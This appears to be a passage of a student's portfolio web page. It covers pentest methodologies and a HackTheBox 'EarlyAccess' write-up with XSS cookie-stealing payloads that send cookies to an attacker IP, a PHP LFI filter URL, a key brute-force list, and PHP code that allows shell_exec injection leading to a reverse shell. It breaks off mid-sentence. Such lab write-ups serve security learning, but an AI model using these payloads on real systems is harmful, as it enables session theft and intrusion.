          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
           <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
          number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
          found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
           <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
